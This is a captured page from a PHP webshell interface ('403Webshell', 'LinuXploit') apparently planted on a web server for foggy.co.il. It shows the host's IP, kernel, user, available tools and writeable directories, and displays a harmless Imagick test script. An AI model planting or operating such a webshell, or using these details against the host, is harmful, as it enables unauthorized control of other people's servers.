403Webshell
Server IP : 147.234.39.149  /  Your IP : 172.30.80.1
Web Server : nginx/1.28.3
System : Linux AICRAFT 6.6.114.1-microsoft-standard-WSL2 #1 SMP PREEMPT_DYNAMIC Mon Dec 1 20:46:23 UTC 2025 x86_64
User : dphoto ( 1000)
PHP Version : 8.5.4
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/foggy.co.il/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/foggy.co.il/imagick-test.php
<?php
header('Content-Type: text/plain; charset=utf-8');

echo "PHP: " . PHP_VERSION . "\n";

if(!class_exists('Imagick')){
  echo "Imagick extension NOT loaded\n";
  exit;
}

$im = new Imagick();
echo "Imagick ext version: " . phpversion('imagick') . "\n";

try{
  echo "IM version: " . $im->getVersion()['versionString'] . "\n";
}catch(Throwable $e){
  echo "getVersion error: " . $e->getMessage() . "\n";
}

$formats = $im->queryFormats();
$hasHeic = in_array('HEIC', $formats) || in_array('HEIF', $formats);
echo "Has HEIC/HEIF in queryFormats: " . ($hasHeic ? "YES" : "NO") . "\n";

echo "HEIC formats: " . implode(', ', $im->queryFormats('HEI*')) . "\n";

Youez - 2016 - github.com/yon3zu
LinuXploit